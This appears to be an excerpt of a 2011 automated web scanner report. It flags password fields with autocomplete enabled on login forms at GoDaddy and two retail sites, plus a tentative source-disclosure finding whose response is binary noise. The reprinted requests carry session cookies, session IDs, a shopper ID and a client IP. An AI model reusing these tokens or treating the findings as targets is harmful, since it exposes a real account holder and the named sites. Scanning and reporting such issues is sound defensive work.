Request

GET /Hosting/web-hosting.aspx?ci=13891&isc=gpash016 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; HPBackground=DanicaImageOne; serverVersion=A; domainYardVal=%2D1; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Hosting/web-hosting.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=ci=13891&isc=gpash016%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash016&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:30 GMT
Content-Length: 161114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=gpash016&ci=9106&spkey=GDSWNET-M1PWCORPWEB123" onsubmit="return pcj_login_action(this);">
<div class="login sprt2">
...[SNIP]...
</div>
<input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" />
</div>
...[SNIP]...
16.12. https://www.godaddy.com/catalog.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /catalog.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /catalog.aspx?isc=GPASH009&se=%2B&ci=287 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=app_hdr=&isc=gpash017%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash017&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; serverVersion=A; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/catalog.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH009&se=%2b&ci=287%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH009&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:35 GMT
Content-Length: 108151


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=GPASH009&ci=9106&spkey=GDSWNET-M1PWCORPWEB123" onsubmit="return pcj_login_action(this);">
<div class="login sprt2">
...[SNIP]...
</div>
<input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" />
</div>
...[SNIP]...
16.13. https://www.godaddy.com/domains/search.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/search.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /domains/search.aspx?isc=gpash005 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; GoogleADServicesgoogleadwordssearch=cjiapcjcgapjuircrfujthnakaycbjcd; BlueLithium_domainsearch=cjiapcjcgapjuircrfujthnakaycbjcd; traffic=server=M1PWCORPWEB123&sitename=www%2Egodaddy%2Ecom&referringdomain=&referringpath=&shopper=42533607&querystring=isc%3DGPASH006%26se%3D%252B%26ci%3D415&isc=GPASH006&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1&split=68; serverVersion=A; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=gpash005%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash005&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_domainsearch=iipghaefqgwcsfkesdadhiafeaagfdfh; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:39 GMT
Content-Length: 210017


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=gpash005&ci=9106&spkey=GDSWNET-M1PWCORPWEB123" onsubmit="return pcj_login_action(this);">
<div class="login sprt2">
...[SNIP]...
</div>
<input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" />
</div>
...[SNIP]...
16.14. https://www.godaddy.com/domains/search.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/search.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /domains/search.aspx?isc=gpash003 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=app_hdr=&isc=gpash017%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash017&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; serverVersion=A; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=gpash003%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash003&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_domainsearch=dbegbbdjagnaejceielbzacgmhtcefba; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:34 GMT
Content-Length: 210017


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=gpash003&ci=9106&spkey=GDSWNET-M1PWCORPWEB123" onsubmit="return pcj_login_action(this);">
<div class="login sprt2">
...[SNIP]...
</div>
<input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" />
</div>
...[SNIP]...
16.15. https://www.godaddy.com/gdshop/hosting/landing.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/hosting/landing.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /gdshop/hosting/landing.asp?isc=GPASH006&se=%2B&ci=415 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=app_hdr=&isc=gpash017%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash017&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; serverVersion=A; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: traffic=server=M1PWCORPWEB123&sitename=www%2Egodaddy%2Ecom&cookies=1&split=68&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&isc=GPASH006&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&referringdomain=&referringpath=&shopper=42533607&querystring=isc%3DGPASH006%26se%3D%252B%26ci%3D415; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:36 GMT
Content-Length: 246299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=gpash006&ci=9106&spkey=GDSWB123" onsubmit="return pcj_login_action(this);">
<div class="login sprt2">
...[SNIP]...
</div>
<input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" />
</div>
...[SNIP]...
16.16. https://www.godaddy.com/gdshop/hosting/landing.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/hosting/landing.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /gdshop/hosting/landing.asp?isc=gpash016 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; HPBackground=DanicaImageOne

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: traffic=server=M1PWCORPWEB123&sitename=www%2Egodaddy%2Ecom&referringdomain=&referringpath=&shopper=42533607&querystring=isc%3Dgpash016&isc=gpash016&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1&split=68; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:26 GMT
Content-Length: 246275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=gpash016&ci=9106&spkey=GDSWB123" onsubmit="return pcj_login_action(this);">
<div class="login sprt2">
...[SNIP]...
</div>
<input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" />
</div>
...[SNIP]...
16.17. https://www.godaddy.com/hosting/website-builder.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /hosting/website-builder.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hosting/website-builder.aspx?app%5Fhdr=&isc=gpash017 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currency1=potableSourceStr=USD; currencypopin1=cdisplaypopin=false; ShopperId1=aabdeikhidaanjedjbmdbbuhxjrjqdfj; Domainer1=false; GoogleADServicesgoogleadwordshome=uapejcegqdmiocxheaujbfpduauaucmb; visitor=vid=c46d38ed-6ae8-4ddf-9d53-4f7b0b891348; ASP.NET_SessionId=dkblhki1sho2xommmjmlxgap; adc1=US; SplitValue1=68; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=isc=GPASH002%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=GPASH002&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; HPBackground=DanicaImageOne; ASPSESSIONIDSEATTTBT=FBAMPOGCKGBCJCOLLGNBNKME; serverVersion=A; domainYardVal=%2D1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB123&status=200 OK&querystring=app_hdr=&isc=gpash017%26hpGoogleStatic%3d1&shopper=42533607&privatelabelid=1&isc=gpash017&clientip=173.193.214.243&referringpath=&referringdomain=&split=68; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:31 GMT
Content-Length: 139715


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=gpash017&ci=9106&spkey=GDSWNET-M1PWCORPWEB123" onsubmit="return pcj_login_action(this);">
<div class="login sprt2">
...[SNIP]...
</div>
<input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" />
</div>
...[SNIP]...
16.18. http://www.my-happyfeet.com/cart.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.my-happyfeet.com
Path:   /cart.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /cart.asp?mode=login&refurl=%2Fcart%2Easp%3Frp%3Dhttp%253A%252F%252Fmy%252Dhappyfeet%252Ecom%252Fproddetail%252Easp%253Fprod%253D0001 HTTP/1.1
Host: www.my-happyfeet.com
Proxy-Connection: keep-alive
Referer: http://my-happyfeet.com/cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCSCRQASR=LKCFJOIBLEKBOBFCACPKBNGA

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 12:09:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 24599
Content-Type: text/html
Cache-control: private

<!-- Copyright, My Happy Feet - All rights reserved. This document and its graphics were created by ATG (http://www.atgincorporated.com/).
Any reproduction of site content or images without written
...[SNIP]...
</script>
   <form method="post" name="checkoutform" action="https://www.my-happyfeet.com/cart.asp">
   <input type="hidden" name="mode" value="checkout" />
...[SNIP]...
<input type="hidden" name="refurl" value="/cart.asp?rp=http%3A%2F%2Fmy%2Dhappyfeet%2Ecom%2Fproddetail%2Easp%3Fprod%3D0001" />
<input type="password" name="pass" size="20" value="" alt="Password" /> <input type="submit" value="Submit" onclick="document.forms.checkoutform.action='cart.asp';document.forms.checkoutform.mode.value='dologin';" />
...[SNIP]...
16.19. https://www.territoryahead.com/account/login/loginmain.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.territoryahead.com
Path:   /account/login/loginmain.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /account/login/loginmain.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
Referer: https://www.territoryahead.com/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mmlID=68408168; CoreID6=82806333286612990907467&ci=90232094; order=63503914; customer=92643931; JSESSIONID=eXga8szVoaFc; s_cc=true; cmTPSet=Y; 90232094_clogin=l=1301081933&v=3&e=1301083733427; PS_ALL=%23ps_catid%7EHome; s_sq=mlTTAprod%3D%2526pid%253DHome/Home%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//www.territoryahead.com/account/login/loginmain.jsp%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:48:49 GMT
Server: Apache
ETag: "AAAAS7ugbfU"
Last-Modified: Fri, 25 Mar 2011 19:33:22 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 41884


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<met
...[SNIP]...
<!-- LOGIN FORM -->
   <form method="post" action="loginmain.jsp" id=form1 name=form1>
   <tr valign="top">
...[SNIP]...
<td><input type="password" name="Password" value="" size=15 maxlength="100" class=login><!-- onkeypress="javascript:form1.guest[0].checked=true;" -->
...[SNIP]...
17. Source code disclosure  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.trafficland.com
Path:   /bing/data.cry

Issue detail

The application appears to disclose some server-side source code written in PHP and ASP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /bing/data.cry?ut=2437a0ba-1b90-4bfa-b90f-f013f6d9e848&cb=8ef6ac22-7768-4e2e-bc3b-28082c1838d2 HTTP/1.1
Host: www.trafficland.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 00:56:33 GMT
Server: Apache
Last-Modified: Sat, 26 Mar 2011 00:53:30 GMT
ETag: "1e770-73850-49f582398d680"
Accept-Ranges: bytes
Content-Length: 473168
Content-Type: text/plain; charset=UTF-8

.X~...L....M6...Q.+Jo!oc....)...Z....:Z1Y..@.pa....8.&........lW7.*B.z..gq.x...+.....p....p.;.......V....t.q.......>..W.....~ET;.[.i..$.^...[.^...e.....P..w...z.6!-......k./.....eaP....7..^.....%....i
...[SNIP]...
.&..
.C...7(......C.X.sc....".......m .K....Zgp.d..K..Q;.Z.i.?.y..;..6.k.u*C).A    u.yKt.2..d.@.xj....t........C.:...=......D;.........}..    .N..X..v...kR|.......0.4.)...
